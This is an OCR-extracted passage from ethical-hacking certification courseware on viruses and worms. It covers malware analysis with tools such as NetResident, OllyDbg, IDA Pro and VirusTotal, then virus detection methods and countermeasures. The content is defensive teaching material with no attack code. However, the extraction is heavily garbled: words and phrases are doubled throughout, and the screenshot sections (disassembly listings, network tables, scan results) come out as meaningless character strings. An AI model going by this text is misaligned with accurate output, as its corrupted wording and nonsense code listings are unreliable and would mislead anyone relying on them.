ESS ES S Offset: Offset:7,803,392,.. 7,803,392,.. n u t
__
1
__ __
11 1
n u r n r
1
n 1r v ? c g 1r _ a g __ ! T m i i n ___
Backed by virtual memory
FIGURE 7.28: 7.28: Process Monito r Screenshot
Module 07 Page 1086
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
M alware A nalysis na lysis Procedure Proced ure
( ^H
( C o n t ’d ’d )
|
(•rtifWd tth.ul N m Iw(
NetResident 5. Record ecord network networ k traffi tr affic c information using the connectivity and log packet content monitoring monitor ing tools such such as NetResid NetResident ent and TCPV TCPView
6. Determi Determine ne the files added, added,
He sear* ve* Evens rods -ep AlDafe | Cr04 04>5*
:.dre3
&0-p£
Fte
■j>* aJ- ess -
OM
Date KV5/2012 2::. !(VS/2 20 0122:1.. 2:1.. :0/5 :0/5/20 /20122:1 - 10/5/2012 2:1. 2:1... - 10/5/ 5 /2 20 012 2:1.. 2:1.. 10/5/20 /20122:1 - 10/5/2 /5/201 012 2:1.. 2:1.. 10/5/2 2012 0122:1 - 10/5/ 5 /2 20 012 2:1 10/5/2 /5/201 012 2:1.. 2:1.. 10/5/30122 2::1 - 10/5/2 2012 0122:1.. :0/5.'I01 :0/5.'I012 2:1 - 10/5/2012 2:1
1 36 1 36 1 20
= E “ 1Q/V2012 S siotoefc 0 « ' * ff l 0 i£ i£ *artyA S 0 *art* *art* B
processes spawned, and change changes s to the registry with wit h the help of registry monitoring tool tools s such as as RegShot RegShot
S3ve •^
Dees
LastLpdated :0/5/30122:14:3. 10 10/5/ /5/2 20 012 122: 2:1^ 1^:4 :4.. .. 10/5/2012 2:14:4. 10/5/2012 2:14:4. 10/5/2 /5/2012 2:14: :14:4.. 4 .. 10/5/2012 2:14:5. 10/5/2 /5/201 0122:14:5.. :5.. 10/5/2 20 0122:1 14:5. 4:5. 10/5/3 /5/3012 2:14: :14:5. 5. 10/5/2 /5/201 012 2:1 2:14: 4:5.. 5.. 10/5/20122 2::14:5. 10/5/2 20 0122:14:5. 10/5/3 30 0123:15:0. 10/5/3012 3: t5:2.
Vj Even Event Octal Octal =totocd ^,Web ^,We b WWeb Web Web web ,y, Web ^ Web ^ Web ^ Web ^ web y / We Web •W Web ^ w«b Wteb
Party A I Pot! A WW-UUQN3... 1076 VV1N-IXQN3... 1104 WIH-LXQN3... 1109 WW-IXQN3 1110 W1H-LXQN3... ... 1111 W1N-LXQN3 1114 1114 W1H1XQN3... .. \V1N-LXCN3 1145 VV1N-IW3N3 1147 WIN-LXQN3... 1163 W1N-LXQN3... 1114 W1N-UQN3... 1164 W1N4.XQN3... 1076 W1N-IXQN3 1205
5arty B mystart-bni... m5003sM-n... maa03s&4-n... maa03s04-n... ... ra303s:4*v.. maa03eD4-n... no nos0 s03» 3»MM-n. n... .. rnaa03st>4-n. n .... nao03*&4-n... nas03«:4 n... **( 3»&4- ... moo03*04 3*04-n... -n... mvctrt mvctrt *xU... ™ 0 .04-«...
Po : B 80 443 *43 *43 •*43 443 90 —1 80 80 443 443 BC 80 8C 80
rvralDH^ TO...•
POS1requestt0 httpe//newt400 ate-aun/ncws/xhr/rhc/MtlMMcr1 Tng ng
Valu4»
CM
52777990230736.52777991632076.52777992527295. 52777990230736. 52777991632076.52777992527295.5277798-180851-1. 5277798-180851-1.52777983170746 52777983170746 52777984394614
a h ttp://w ww . tamos, tamos, com
Copyright © by E&Coincil. All Rights Reserved. Reproduction is Strictly Prohibited.
M a l w a r e A n a l y s is i s P r o c e d u r e (C ( C o n t ’d ’d ) S t e p 5: 5: R e co c o rd r d n e t w o r k t r a f f i c i n f o r m a t i o n u s in in g c o n n e c t i v i ty t y a n d l og og p a c k e t c o n t e n t monitoring tools such as NetResident and TCPView Step 6: Determine the files added, processes spawned, and changes to the registry with the h e l p o f r e g i s t r y m o n i t o r i n g t o o l s s u c h as as R e g S h o t
NetResident —
S o u rc e : h t t p : / / w w w . t a m o s . c o m
NetResident
is
a
network
content
analysis
application
designed
to
monitor,
store,
and
reconstruct a wide range of network events and activities, such as email messages, web pages, downloaded files, instant messages, and VoIP conversations. It uses advanced monitoring t e c h n o l o g y t o c a p t u r e t h e d a t a o n t h e n e t w o r k , s a ve v e s t h e d a t a t o a d at at a b a s e , r e c o n s t r u c t s i t, t, a n d d i s p la la y s t h e c o n t e n t .
Module 07 Page 1087
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
. n x
S NetResident NetResident - Evaluation Evaluation Versio Versionn
Fte Search View Events Tools Help Al Data Data | Events
' Grou Groups ps *
Refresh Refresh | y
Groups
Fiter - I Count
0 0 0 Dates 0 S 10/5/2 /5/20 012 H 0 ^ Protocols 0 4 * ) Web 1 0 2 Party A B 0 ® PartyB
1 36 1 36 1 20
IP Address * | , Date u 10/5/2 10/5/2012 012 2:1... u 10/5/2012 2:1... 10/5/2012 2:1... a 10/5/2012 10/5/2012 2: L. . 10/5/2012 2: 1. 1... a 10/5/2 /5/20 012 2:1. 2:1... .. Q 10/5/ 10/5/20 2012 12 2:1... 2:1... a 10/5/2 /5/20 012 2:1. 2:1... .. a 10/5/2 /5/20 012 2:1. 2:1... .. a 10/ 5 5//2012 2: 1 1... . /5/201 012 2 2:1. 2:1... .. o 10/5/2 a 10/5/ 10/5/20 2012 12 2:1... 2:1... a 10/5/2 /5/20 012 2:1 2:1.. .... 10/5/2 10/5/201 012 2 2:1...
Save Save * ^
Delete Delete |1^ ) Event Event Detail Detail
Last Updated 10/5/20 10/5/2012 12 2:14:3.. 2:14:3.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2012 2:14:4.. 10/5/2 /5/20 012 2:14: :14:5 5.. 10/5/ 10/5/20 2012 12 2:14:5 2:14:5.. .. 10/5/2 /5/20 012 2:14: :14:5 5.. 10/5/2 /5/20 012 2:14: :14:5 5.. 10/ 5 5// 2 20 012 2: 1 14 4: 5 5... 10/5 10/5/2 /20 012 2:1 2:14:5. 4:5... 10/5/ 10/5/20 2012 12 2:14:5 2:14:5.. .. 10/5 10/5/2 /20 012 2:1 2:15: 5:0. 0... 10/5/2 10/5/201 012 2 2:15:2.. 2:15:2..
| Pr Protocol ^ Web ^ Web ^ Web ^ Web ^ Web Web 8 IH ^ Web Web Web ^ Web W Web ^ Web ^ Web
Party A
Port A
WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... WIN-L IN-LX XQN3... 3... WIN-LXQN3... WIN-LXQN3... WIN-LXQN3... ... WIN-LXQN3... ... WIN-LXQN3... WIN-L IN-LX XQN3... ... WIN-L IN-LX XQN3... 3... WIN-LXQN3... WIN-LXQN3...
1076 1104 1109 1110 1111 1114 1114 1145 1147 1163 1114 1164 1076 1205
U Part Partyy B mystarHon.1... maa03s04-«n... ... maa03s04 in... maa03s04-tn... maa03s04-in... maa03s04 in... maa03s04-in... maa0 maa03s 3s04 04-in -in... ... maa03s04-in... maa03s04-in... maa03s04-in... maa03s04-in... myst mystar artt-to ton. n.i.. i.... maa03s04-in...
<1 Iw t D d ii ______________ ____________________ _____________ ______________ ______________ _____________ ________ __ S' '
'• ) I
I I r j L^j
Port B 80 ± 443 443 443 443 443 443 443 80 — 80 80 443 443 443 443 80 80 80
V
More... *
POST request to http://news.goog!e.co.in/news/xhr/rhc?authuser=0 Tag
cid cid
Value
52777990230736.52777991632076.52777992527295.52777984808514.52777983170746.52777984394614
J _________________________________ _________________________________________________ _________________________ _________ [Q Conn Connect ected ed
\~T \
180 bytes
1,067,459
FIGURE 7.29: NetResident Screenshot
Module 07 Page 1088
Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
M alware A nalysis na lysis Procedure Proced ure ( C o n t ’d ’d )
( ^H (•rtifWd
| tth.ul
NmIw(
7. Collect the following foll owing information using debugging tools tools such as OllyDbg ll yDbg and ProcDump: ® Service reque requests sts © Attempts Attempts for incom incoming ing and outgoing connections © DNStables information
Copyright © by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M a l w a r e A n a l y s is i s P r o c e d u r e (C ( C o n t ’d ’d ) Step 7: Collect the following information using debugging tools such as OllyDbg and ProcDump: ©
Service requ ests
©
Attem pts for incoming and outgoing connections
0
D NS NS t a b l e s i n f o r m a t i o n
OllyDbg
1
Source: h t t p : / / w w w . o l l y d b g . d e O l l y D b g i s a 3 2 - b i t a s s e m b l e r - l e v e l a n a ly ly z i n g d e b u g g e r f o r M i c r o s o f t W i n d o w s
E m p h a si si s o n
binary code analysis makes it particularly useful in cases where source is unavailable.
Module 07 Page 1089
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
_
Oll yDbg OLLYDBG.EXE - (CPU■mai PU■main n thread, hread, modul odule e OLLYDBG] C] Fik
View
g40M W l0\
Debug
!
Plugins
Options
Window
PUSH ECX
v m 0040100?
3
L
?0 .. E 8 72E80000 OCALL 'JMP.t*ERf€L32.H««cmioe> R EOX.EOX EOX.EOX 00 0 0 * 0 1 0 00 0 0 SHORT OLLVOOG. 004 010 06 JI1Z SHORT .v7 S 0 0 004C10OC . 08 08 F 00FO 0O W ERX. ERX.0F 0FO O BO 6F FO FF F PUSH 00401001 . E8 COLL 0LLV066.0040106C EOX 0 O4O1O86 > SO8B 00401007 . 60 PUSH EOX 3S1 3S18014000 PUSH 004O1OOS . FF SH DUORO PTR OS!14 00110 ) CALL OLLVOOG.00400304 0O4O1OOE . E O1 OS 11C 3BO O O 000 PU 1 0 1 4 & PUSH DMOR DMORO PTR DS1 (4 801 103 O04O1OC3 . FF3 0 04e1oc9 . E8 10c30565 POP CALL OLLVOOG.004OO3E8 004010CE •SF EDI •S F 004e10CF >£? 9c9 9C000009 RETN 0 0 4 001100000s .. 60e W J ECX.9C OR ECX.ECX ECX.ECX 0 0 4 0C 3 00401OF3 >t 0330 \ m \ u m C«P C«P OM OMOPO PTR PTR OS*[40 OS*[40 011 0 0 . 00401OFft . 72 2 JO SHORT OLLVOOG. 004 011 24 € 35 51 1 8 0 1 4 8 0 0 PUSH 0*OR© PTR OS: [400110) 004010FC . FF3 OLLVOOG.004003C4 102 . E8 ed;’ 5h65 OCULL « 11107 R EOX.EOX EOX.EOX 00401003 00401000
l
H<«>S12• => 9C (156.1 . f i w : MEPP_iER0_r^nd [CG»t Proe *t «H»4e «H»4e
kltoao
HtaoOltoe
. o0co
jM nw
ha mmam
JE SHORT OLLVOOG. OLLVOOG. 004 011 24 PUSH EOX PUSH 0 CRLL JMP.tKERJCL32.G«tProc«»»H*«o> PUSH ERX CRLL
j ?0000
e bx
t f o
El►
O04010OO iXLVt»1.
EF. ST0 STl ST2 ST2 ST3 ST4 ST S
00000244 N0 .f«.E.B£.NS.PE .GC.LE1 •noty 0.0 •noty 0.0 ♦ *©«y 0.0 «no«y 0.0 «n0ty 0.0 tfv ty 0.0
= 00 000000 IAral 0LLV4CG . O04OO3O4 O04OO3O4 r
•OLLVOOG. 0O4RO3C4
rc• rc•
_ _
ECX OOOOOOOO COX 0 M 9I 0M OLL'.CG OLL'.CGO. O.
ESP O018FF88
eo x o f c
00401109 00401100 00401 IOC 00401 IOC 00401113
x
L k l]
Hd p
m>. ECx.x
004010*0
a
E 32bi FF FF FF I CS S002 0026 3 32bit 33 32b 2bIt bltlttt 0( 0(FFF FF FF FFF F > S S 002 8 32 bI 9( FF FF F F FI O S 8 32bi 32 0(FF 0( FF1 F S0 S002 002032b *3 *3 32b 2bit bitiittt 0(FF 7FFF O9FF CF 0FF 00 6$00 6$ 00 20 32bi F F F1 FFFF)F1 LtttErr r r EftftOR_tOO_MOT_FOUMO<000000?E1
3 2 10 Coftd 0 0 0 0 Pr*< NEAP,S3
Err ESPU020I OOO0O0d0 r1**k 11111t
- :! :! >
F1*» *»t =>CRP_2ER0_rCnC
CG«t Pt oc« t *He «c
I l>Ht«p I****"
RETU RETURN RN to 0019FF9C
FIGURE 7.30: OllyDbg Screenshot
Module 07 Page 1090
Ethical Hacking and Countermeasures Copyright © by EC-COUIICil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
V iru s A na lysis Tool Tool:: ID A Pro
CEH Urt>fW4
ttfciul NmIm
h t t p : / / w w w . h e x - r a y s .c .c o m
Copyright Copyright © by E &Cai ncil . All Rights Reserved. Reproduction is Strictly Prohibited.
V irus An alys is Tool: Tool: IDA Pro Source: http://www.hex-rays.com This is is a dissembler and and debugger tool th at supports both Window s and and Linux Linux platforms.
Dissembler The dissembler displays the instruction execution of various programs in symbolic form, even if the code is available in a binary form. It displays the instruction execution of the processor in the form of maps. It enables its users to identify viruses as well. For example, if any screensavers or "gif" files are trying to spy on any internal applications of the user, IDA Pro Tool reveals reveals this im mediately. IDA Pro is developed with the latest techniques that enable it to trace difficult binary codes. These are displayed in readable execution maps.
Debugger The debugger is an interactive tool that complements the dissembler to perform the task of static analysis in one single step. It bypasses the obfuscation process, which helps the assembler to process the hostile code in-depth.
Module 07 Page 1091
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
IDA IDA Pro Pro is a tool th at allows you to explore any softw are interr upti ons and and vuln erabilities and to use it as tamper resistance. It is an interactive, programmable, multi-processor disassembler coupled to a local and remote debugger and augmented by a complete plugin programming environment. This can also be used to protect your essential privacy rights. This is used by antivirus companies, research companies, software development companies, agencies, and military organizations. IDA -C:\Program Files (x86)\IDA (x86)\IDA Demo 6.3\qwingraph 6.3\qwingraph.exe .exe File
Edit
Jump
Search
View
Debuggei
Options
Windows
► 1
?
^
III (71 Finctxms wndow
j IDA View-A View-A Q
~ I° I * B
Help
| | g ] Hex View-A View-A
|
^
f a !« !«■ r
IM ■ :!
ft] Struc ture s
Z 3
________ | 1*5[ I QS En ure ________ 1*5[ j j * Exports
uar_C= dword p tr -OCh -OCh uar_8= duord ptr -8 = o a r ^ ' dword dword ptr -< -<* hInstance- duord ptr <1 hPreuInstance- dword ptr lpCn dLin e- duord pt r OCh nShowCndnShowCnd- dword p tr 10h 10h
Function name sub_401070 sub.401200 sub.401230 sub_4012F0 sub_4O13A0 sub.4015A0 sub_402EA0 $ub.402EC0 sub_403140 sub_403330 sub.403500 sub.403680 sub.403900 sub.403920 sub.403960 sub_403A40 sub 403B30
1 sub le a push push call push l ea ea push call add mou ca ll how
e s p , 18h ea x x,, [ es es p » 1 8 h » u a r _ 1 «i ] ea x OFFFFFFFFh d s : G e t C o nn nn a n d L in e W ea x e cx cx , [ es p »Z < ih «u a r_1 0 ] ec x ds :? f ronWCharftrray ronWCharftrray0QStrin 0QString0QTBBSf g0QTBBSfl?ftU1 l?ftU120PBGH02 20PBGH02 ; QT: QT: :QString::FromWCharArray(ushort :QString::FromWCharArray(ushort const const e s p , OCh ecx, eax d s: s: ?t ?t oL oL o ca ca l8 l8 Bi Bi tB tB Q St St ri ri ng ng 6Q 6Q T BB BB Q BE BE ?A ?A U QB QB yt yt eA eA rr rr ay ay Q 2Q 2Q X Z ; QT: : Q S t r i n g : : t o L o c a l 8 B i t ( u o i d ) edx, [esp*18h*war_10]
M-iw OCCCCCCCCH 1 0 0 . 0 0 * ( - 1 4 1 , 1 0 5 ) ( 5 0 9 , 2 6 ) 0 0 0 41 41 3 57 57 0 0 44 44 1 F 5 7: 7: » i n M 4 i n ( x , x , x , x ) + 2 7
Line 2 of 944
[g* Output wndow C o m p i li li n g
file
Files
( x 8 6 ) \I \I D A
D em o
E x e c u t in in g C o a p i l in in g
function 'm ain'... f ile * C :\ :\ P ro ro g r an an 1 F i l e s
' C :\ :\ P ro ro g r a m
( x 8 € ) \I \I D A
De D esa □ 6 . 3 \ i d c \ o n l o a d . i d c ' . . .
executing
function
I D A i a a n a l y s in in g Y ou o u ma ma y s t a r t t o Using
F L IR IR T
' O n L o ad ad '
t h e in in p u t f i l e . . . e x p l o r e t h e in in p u t
signa ture:
Module 07 Page 1092
6.3\idc \id a.id c'.. .
file
M icrosoft Visua lC
righ t
n ow ow .
2 - 1 0 /n /n e t
runt
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Online Online Malwar Malwaree Testing: Testing: : VirusTotal "Tj|
r EH V tttK4l tttK4l IU(hM
M VirusTotal VirusTotal is a free service that analyzes suspicious suspicious files and URL URLs s and facilitates the t he detection of viruses, worms, Trojans, etc.
3Antfwusian for fbili®
C 1 ft
&
& riru!to
£ htips: 'vk'^w.virustotaLconn ' e/C’5'5'd625c39d3d5d9l041b9720a30c2fb1e757e603695d3478687c27c392fdt.an.aly$s^-
Community
St Statistics
v
E
i r u
Do DocantflUlidn
FA FAQ
About
Join our community
total
SHA2&6
06131d62$c?9dMM91W1W720a30c2ti1«76796C3695
File name
smo«a_O6131
*K »
12.*“ *“ “ "
=
Sign m 1
0
^
0
41 7
2012-07.T7 K:S 2:M UTC (2 ™ .hi 2 oMk i •g )
Mumml!*•(* (** 12VB
http://www http:/ /www.virustotal.com
V
Antlvliuc
Kutulf
Update
AhnLab-V3
WifiTrojar WifiT rojarvMM vMM ueker 1036288
20120716
AntiVif
BOCWm m x m 23G1
20120716
Antiy-AVL
Bach(fc>o c>or W1n.32M oSuckei oSucke i gen
20120717
Avast
Win32 Tro!an-gen
20120716
AVG
Bac ■CoorMmuc kw
20120716
.Ccipyright © by EC-C0MCi. All Rights Rese rveC Reproduction isStrict ly Prohibited.
|p5|
O nline M alw are Testing: VirusTotal
—
Sour ce: http://www.virustotal.com
VirusTotal is a service that analyzes suspicious files and facilitates the quick detection of viruses, worms, Trojans, and all kinds of malware detected by antivirus engines. Features: 0
Free Free and in dep end ent service
0
Uses ses mul tip le antiviru s engines
0
Comprised of real-time auto auto matic updates of virus signatures
0
Gives ives detail ed results results fro m each each antiviru s engine
0
Has real-ti me global statistics
Module 07 Page 1093
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking Hacking and Counte rmeasu res Viruses and Worms
Exam 312-50 Certified Ethical Hacker
° ♦
C i *P« ^
0»^»0 / » /06 >(»5>«> >1 >»1<4 97;0» 0}^(^ 7 *»( » >1 47 6*7>27) »»/«%^« 0
< ■
3 / i ru ru ! t o t a l
S! / i r u s t o t a l
*N £
* 0
J7141
£^**
§ 0
»V-071r«M00UTC(?re«mt |«M>**90)
Mwnum Mtwt 3JMB
WtaTropnMDttickw 103(288 OOCMotutM•2 Ol Bactdoor\VnX2MoSucktf 9•
mfray snt*t toscjn toscjn a URL or starchthrtughth* /ru»Tc« d
WW2Tr0|J09*n BactOooi M1 M1»ucM« cM«
FIGURE 7.32: virustotal Screenshot
Module 07 Page 1094
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Online Malware Analysis Analysis C p V T T l / t p Q f j ^
I
Y
X
v T O
ltf c.n l
Anubis: Analyzing Unknown Binaries
n
, Mm hat
Metascan Online h t t p : / / w w w . . m e t a s c a n - o n l i n e , c o m
h t t p : / / a n u b i s . i se c l a b . o r g
i
•
___ j >
Avast! Online Scanner
Bitdefender QuickScan
http://onlinescan. avas t. com
h t t p : / / w w w . . b i t d e f e n d e r . c o m
Malware Protection Center
GFI SandBox
https://www.microsoft.com
h t t p : / / w w w . . g f i . c o m
ThreatExpert
UploadMalware.com
h t t p : / / w w w . t h r e a t e x p e r t . c o m
h t t p : / / w w w . . u p l o a d m a l w a r e . c o m
Dr. Web Online Scanners
Fortinet
h t t p : / / v m s .d .d r w e b . c o m
h t t p : / / w w w . f o r t i g u a r d . com
Copyright Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
O nline nli ne M alware Analysis Analysi s Services Servi ces (J ___ I
Online m alwar e analysis analysis services services allo allo w you to scan scan files and and resources and and secure
them before attackers attack and compromise them. A few online malware analysis services are listed as follo ws: 0
Anubis: Analyzing Unknow n Binaries Binaries available at http://anubis.iseclab.org
0
Avast! Online Scanner Scanner available at http://onlinescan.avast.com
0
Malwar e Protection Center available available at https://www.microsoft.com
0
ThreatExpert available available at http://www.threatexpert.com
0
Dr. Web Onlin e Scanners Scanners availab le at http://vms.drweb.com
0
Metascan Online available at http://www.metascan-online.com
0
Bit defen der QuickScan QuickScan available at http://www.bitdefender.com
0
GFI SandBox SandBox availab le at http://www.gfi.com
0
Upload Malware.com available available at http://www.uploadmalware.com
0
Fortinet available available at http://www.fortiguard.com
Module 07 Page 1095
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
CEH
Mo M o d u l e Flow
T y p e s
o f
V ir u s e s
P e n e t r a t i o n
C o m p u te r
T e s t i n g
W o rm s
M a lw a r e A n a l y s is
Copyright Copyright © by E &Cai ncil . All Rights Reserved. Reproduction is Strictly Prohibited.
Module Flow So far, we have discussed various viruses and worms and malware analysis. Now we will discuss the countermeasures to be applied to protect against viruses and worms, if any are found. These countermeasures help in enhancing security.
Virus and Worms Concept
Malw are Analysis Analysis
^ •
Ty p es o f Vi r us es
Co u n t er m eas u r es
y — y—
Computer Computer Worms
^
Penetration Testing Testing
This section section highlights various various virus and wor m cou ntermeasures.
Module 07 Page 1096
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
V irus D etectio ete ctionn M etho ds
CEH
In t e g r it y S c a n n in g
I n t e r c e p t io n C h e c k in g
Once a virus has been detected, it is possible to write scanning programs that look for signature string characteristics of the
Integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors
The interceptor monitors the operating system requests that are written to the disk disk
Copyright Copyright © by Et Gl Ui Ci l. All Rights Reserved. Reserved. Reproduction Reproduction is Strictly Prohibited. Prohibited.
Virus Vir us Detection Detecti on M ethods A vir us scann sc anner er is an an im p o rt an t piece pi ece of so ft war e t h at on e sho uld have in st alled on th e PC. If there is no scanner, there is high chance that the system can be hit by and suffer from a virus. A virus protector should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. Antivirus software is of no use if it does not know what to look for in the latest virus. One should always remember that an antivirus program cannot stop everything. The rule of thumb is if an email looks like a suspicious one, e.g., if one is not expecting an email from the sender or does not know the sender or if the header looks like something that a known sender would not normally say, one must be careful about opening the email, as there might be a risk of becoming infected by a virus. The MyDoom and W32.Novarg.A@mm worms infected many Inter net users users recently. These These worm s in fected m ost users users throu gh email. The three best methods for antivirus detection are: ©
Scanning
Q
Integr ity checking
©
Interception
In addition, a combi nation of some of these techniqu techniqu es can can be mor e effective.
Module 07 Page 1097
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
Scanning Q
The mo men t a virus is detec ted in the wild, antivir us vendors across across th e globe start writ ing scanning scanning programs th at look fo r its signature strings (characte (characteristic ristic o f the virus). virus).
©
The strings are are ident ified and and extr acted fro m th e virus virus by these scanner scanner writers. The The resulting new scanners search memory files and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected.
0
Virus writ ers often create many new viruses viruses by alterin g the existing existing one. What looks like like a new virus, may may have taken just a few minutes to be created. Attack ers m ake these changes frequently to throw off the scanners.
© In addition t o sign ature recog nition , new scanne scanners rs make use use of various various oth er detection techn iqu es such such as as code analysis. analysis. Before looking i nto th e code characteristics of a virus, the scanner examines the code at various locations in an executable file. © In ano th er possibility , the scanner sets sets up a virt ual c om pu ter in th e RAM RAM and and tests the programs by executing them in the virtual space. This technique, called "heuristic scanning," can also check and remove messages that might contain a computer virus or other unwanted content. e
The major advantages of scanners scanners are: are: © They can can check check programs before they are are executed. Q It is the easiest easiest way to check new software for any known or malicio us virus.
Q
The major drawbacks to scanners scanners are: are: Q Old scanners scanners could prove to be un reli able. With th e tr emend ou s increase in new viruses old scanners can quickly become obsolete. It is best to use the latest scanners available on the market. Q Even a new scann er is never eq ui pp ed to h andl e all all new chall enges, since viruses appear more rapidly than new scanners can be developed to battle them.
Integrity Integrity C hecking 0
Integrity checking checking products perform their functions by reading reading and and recording recording integrated data to develop a signature or base line for those files and system sectors.
Q
Integr ity produ cts check check any prog ram with b uil t-in intelli gence. This This is really th e only solution that can take care of all the threats to data. The most trusted way to know the amount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established base line.
Module 07 Page 1098
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Q
Exam 312-50 Certified Ethical Hacker
A disadvantage of a basic basic integrity ch ecker is th at it cannot cannot d iffer enti ate file corr upt ion caused by a bug from corruption caused by a virus.
Q
However, ther e are are some advanced advanced in tegri ty checkers checkers available th at are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers combine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process.
Interception 0
The main use use of an an interc epto r is for deflecting logic bombs and and Trojans. Trojans.
Q
The interc epto r controls requests to the op erating system system for n etwor k acce access ss or actions actions that cause a threat to the program. If it finds such a request, the interceptor generally pops up and asks if the user wants to allow the request to continue. There are no dependable ways to intercept direct branches to low-level code or direct instructions for input and output instructions by the virus.
In some case cases, s, th e virus is capable of disabling the m on ito rin g p rogr am itself. Some years back back it took only eight bytes of code for a widely used antivirus program to turn off its monitoring functions.
Module 07 Page 1099
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
V i ru r u s a n d W o rm rm s C o u n t e r m e a s u r e s
CEH
Install anti-virus software that detects and removes infections as they appear
Generate an anti-virus policy for safe computing and distribute it to the staff
Pay attention to the instructions while downloading files or any programs from the Internet
Update the anti-virus anti-virus software regularly Avoid opening the attachments received from an u nknown sender as viruses viruses spread via e-mail e-mail attachments Possibility of virus infection infection may corrupt data, thus regularly regularly maintain data back up
Schedule regular scans for all all drives after the installation of anti-virus anti-virus software Do not accept disks or programs without checking them first using using a curr ent versio n of an antiantivirus program
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction Reproduction is Strictly Prohibited. Prohibited.
V i ru ru s a n d W o rm rm s C o u n t e r m e a s u r e s Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be minimized. Some of these methods include: 0
Insta Install ll antivirus antivirus soft ware th at detects detects and and removes infections infections as as they appear
©
Generate an antivirus antivirus policy for safe safe com put ing and distri bute it to the staff
0
Pay attention to the instructions instructions while down loading files or any any programs programs
from the
Internet 0
Update the antivir us so ftw are on the a mon thly basis basis,, so th at it ca can identify and clean clean out new bugs
0
Avoid opening the attachm ents received from an unkno wn sender as as viruses viruses spread spread via email attachments
0
Possibility ossibility of virus infection may cor rup t data, thus regularly maintain data back up
0
Schedule Schedule regular sca scans for all all drive drives s after the installation installation of antivirus antivirus sof tware
0
Do not accept accept disk disks s or progr ams with ou t checking checking them first using using acurr ent version version of an antivirus program
Module 07 Page 1100
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses and Worms
Exam 312-50 Certified Ethical Hacker
V i ru r u s a n d W o rm rm s C o u n t e r m e a s u r e s (Cont'd)
EH
Run disk clean up, registry scanner and defragmentation once a week
Ensure the executable code sent to the organization is approved
Turn on the firewall if the OS used Do not boot the machine with infected bootable system disk
is Windows XP
Run anti-spyware oradware once in a week
Know about the latest virus threats
Block the files with more than one file type extension
Check the DVD and CDs for virus infection
Q W
Be cautious with the files being sent through the instant messeng er
Ensure the pop-up blocker is turned on and use an Internet firewall
^1
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited
Virus Vir us and W orms C ou nterm easu res (Cont’d (Cont’d) 0
Ensure nsure the executabl e code sent to the organization organization is approved
0
Run disk clean clean up, registry scanner, scanner, and def rag m ent ati o n once a week
0
Do not boot the machine machine wit h infected boo table system disk disk
0
Turn on th e fir ewall if th e OS OS used used is Wind ows XP XP
0
Keep Keep info rmed abou abou t the latest latest virus threats
0
Run ant i-sp yw are or adw are once in a week
0
Check Check th e DVD DVDs s and CDs fo r virus inf ecti on
0
Block Block the files files with m ore than one file typ e extension
0
Ensure nsure the pop-up blocker is is turn ed on and and use use an Inter net fir ewall
0
Be cautious wit h the files files being being sent sent throu gh the instant messenger messenger
Module 07 Page 1101
